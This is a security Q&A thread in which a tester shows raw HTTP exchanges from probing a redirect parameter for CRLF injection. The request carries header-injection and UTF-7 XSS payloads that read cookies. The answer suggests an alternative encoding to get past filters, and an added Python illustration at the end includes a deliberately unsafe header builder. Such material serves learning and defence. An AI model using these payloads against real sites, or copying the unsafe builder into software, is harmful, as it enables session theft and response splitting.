How to exploit CRLF injection?

I was running some tests on a website when I came across this:

Request:

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

Once forwarded, the response was the following:

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>

After a few hours of fiddling with different parameters, I think I have found a CRLF injection inside the parameter "intended_params=format%3Dhtml" that changes the Location header and the redirect URL:

Request:

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

Response:

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>

Is this behaviour exploitable in any way? Can you use it to set cookies or cause HTTP response splitting?

Thanks in advance.

posted by Mico 10.05.2015 - 11:12

1 answer

As @Gumbo said, the CRLF is correctly encoded as %0d%0a in the resulting URL, as you can see. If it had set the headers as you passed them in the parameters, you would have seen those headers separately. You can try a different encoding instead, like %E5%98%8A%E5%98%8D :)

The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

If you are able to split the response, you can carry out other exploits as defined here. That explains which attacks can be performed if one is able to manipulate the HTTP headers.

Headers are separated by a CRLF, and the response headers are separated from the body by two, allowing you to insert your own spoofed content.

Since the response is a 302, however, it is very hard to exploit. Still, you might find the following interesting, please take a look.
link
The author managed to trigger XSS in IE despite the 302 redirect.

answered 11.05.2015 - 02:15
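As an added illustration of the answer's point (example code, not from the thread): the check a framework should apply before emitting a Location header, next to a constructed unsafe builder and a small response splitter that shows why the percent-encoded %0d%0a in the question's response does not split it. Treating U+560A/U+560D as CR/LF look-alikes is an assumption drawn from the %E5%98%8A%E5%98%8D bytes the answer suggests trying.

```python
import re
from urllib.parse import quote

# Added example, not code from the thread. Raw CR/LF plus the code points
# behind the %E5%98%8A%E5%98%8D bytes the answer mentions (U+560A, U+560D),
# which some stacks have reduced to LF/CR when narrowing header strings.
_CRLF_LIKE = re.compile(r"[\r\n\u560a\u560d]")

def contains_crlf(value: str) -> bool:
    """True if the value could terminate a header line."""
    return _CRLF_LIKE.search(value) is not None

def safe_header_value(value: str) -> str:
    """Refuse to emit a header whose value would end the header line."""
    if contains_crlf(value):
        raise ValueError("CR/LF or look-alike in header value")
    return value

def build_redirect(base: str, param: str) -> str:
    """Build a Location value the way the site in the question does:
    untrusted input is percent-encoded, so %0d%0a stays inside the URL."""
    return safe_header_value(f"{base}?intended_params={quote(param, safe='')}")

def response_with_location(location: str) -> bytes:
    """Constructed 302 that copies the given string into Location with
    no further encoding, i.e. what an unsafe framework would emit."""
    return (b"HTTP/1.1 302 Found\r\nLocation: " + location.encode("utf-8")
            + b"\r\nContent-Length: 0\r\n\r\n")

def split_response(raw: bytes) -> tuple[list[str], bytes]:
    """Split a raw response into header lines and body at the first blank
    line, as a client would; shows whether a value really split it."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.decode("latin-1").split("\r\n"), body
```

Feeding the unsafe builder an unencoded value yields an extra header line and a forged body, while the encoded form keeps everything inside the single Location header.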